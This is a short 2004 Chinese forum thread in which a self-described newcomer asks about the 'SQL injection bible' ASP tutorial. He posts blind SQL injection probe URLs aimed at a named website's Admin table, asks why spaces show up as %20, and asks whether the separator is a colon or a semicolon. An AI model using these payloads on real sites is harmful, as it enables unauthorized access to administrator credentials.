SQL注入天书 - ASP注入漏洞全接触 - 网络安全 - 黑色海岸线论坛 —

天堂使者 该用户已被删除

楼主 跳转到 »

天堂使者发表于 2004-6-8 09:34 | 显示全部帖子

SQL注入天书 - ASP注入漏洞全接触

http://www.19cn.com/showdetail.asp?id=49 ;;and (select top 1 len(username) from Admin)>0
这里在地址栏里输入
将会有空格！就会把空格显示为%20
那么怎么解决呢！
我是新成员
还请高手指教

天堂使者 该用户已被删除

沙发

天堂使者发表于 2004-6-8 10:14 | 显示全部帖子

http://www.19cn.com/showdetail.asp?id=49%20;;and%20(select%20top%201%20len(username)%20from%20Admin)>0
在地址里显示这样
也对？

天堂使者 该用户已被删除

板凳

天堂使者发表于 2004-6-8 11:31 | 显示全部帖子

;;and (select top 1 len(username) from Admin)>0
中and 前面是冒号还是分号啊？

天堂使者 该用户已被删除

地板

天堂使者发表于 2004-6-9 11:01 | 显示全部帖子

你说的图片我看不到哦